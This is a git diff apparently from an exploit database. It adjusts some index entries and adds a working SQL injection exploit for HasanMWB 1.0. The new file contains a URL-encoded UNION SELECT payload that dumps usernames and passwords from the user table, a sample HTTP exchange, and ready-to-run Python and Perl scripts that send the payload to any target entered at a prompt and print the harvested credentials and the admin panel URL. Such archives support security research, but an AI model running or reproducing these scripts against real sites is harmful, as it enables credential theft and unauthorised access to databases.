diff --git a/exploits/linux/webapps/45933.py b/exploits/linux/webapps/45933.py
index 5e9571e0b..4fdfdbc0b 100755
--- a/exploits/linux/webapps/45933.py
+++ b/exploits/linux/webapps/45933.py
@@ -1,4 +1,4 @@
-# Exploit Title: Apache Superset 0.23 - Remote Code Execution
+# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
 # Date: 2018-05-17
 # Exploit Author: David May (david.may@semanticbits.com)
 # Vendor Homepage: https://superset.apache.org/
diff --git a/exploits/php/webapps/45955.txt b/exploits/php/webapps/45955.txt
new file mode 100644
index 000000000..c31967927
--- /dev/null
+++ b/exploits/php/webapps/45955.txt
@@ -0,0 +1,100 @@
+# Exploit Title: HasanMWB 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-05
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
+# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+#GET /PATH/index.php?hsn=category&id=1%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d HTTP/1.1
+#Host: TARGET
+#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+#Accept-Language: en-US,en;q=0.5
+#Accept-Encoding: gzip, deflate
+#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
+#DNT: 1
+#Connection: keep-alive
+#Upgrade-Insecure-Requests: 1
+#HTTP/1.1 200 OK
+#Date: Wed, 05 Dec 2018 00:24:09 GMT
+#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+#X-Powered-By: PHP/5.6.30
+#Expires: Thu, 19 Nov 1981 08:52:00 GMT
+#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+#Pragma: no-cache
+#Content-Length: 2697
+#Keep-Alive: timeout=5, max=100
+#Connection: Keep-Alive
+#Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 1) 
+#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
+# Etc..
+
+#!/usr/bin/python
+import urllib2
+import re
+
+print """
+         \\\|///
+       \\  - -  //
+        (  @ @ )
+ ----oOOo--(_)-oOOo----
+HasanMWB 1.0 - SQL Injection
+    Ihsan Sencan
+ ---------------Ooooo----
+                (   )
+       ooooO     ) /
+       (   )    (_/
+        \ (
+         \_)
+"""
+ 
+s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
+e = ("index.php?hsn=category&id=1")
+p = ("%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d")
+response = urllib2.urlopen(s+e+p)
+c = response.read()
+up = re.findall(r'<h2>(.*)</h2>', c)
+ 
+print "Server: ", response.info()['server']
+print (up)
+print "Login Url:"+(s)+"panel.php"
+
+
+#!/usr/bin/perl
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+
+print "**************************\n";
+print "HasanMWB 1.0 SQL Injection\n";
+print "Ihsan Sencan\n";
+print "**************************\n";
+
+use LWP::UserAgent;
+print "\nTarget:[http://localhost/[PATH]/] ";
+chomp(my $target=<STDIN>);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+ 
+$E="/index.php?hsn=category&id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d";
+$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
+$host = $target . "".$E."";
+$res = $cc->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/<h2>(.*?)<\/h2>/){ 
+print "[+] Success !!!\n";
+print "\n[+] Detail : $1\n";
+print "$target/panel.php";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 013bfdae5..015cb11be 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10126,7 +10126,7 @@ id,file,description,date,author,type,platform,port
 45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
 45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
-45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
+45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,ttffdd,local,multiple,
 45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
 45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
 45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
@@ -40441,8 +40441,8 @@ id,file,description,date,author,type,platform,port
 45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80
 45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80
 45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
-45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
-45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
+45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
+45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
 45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
 45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
 45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
@@ -40453,3 +40453,4 @@ id,file,description,date,author,type,platform,port
 45948,exploits/php/webapps/45948.py,"NUUO NVRMini2 3.9.1 - Authenticated Command Injection",2018-12-04,"Artem Metla",webapps,php,443
 45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
 45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
+45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80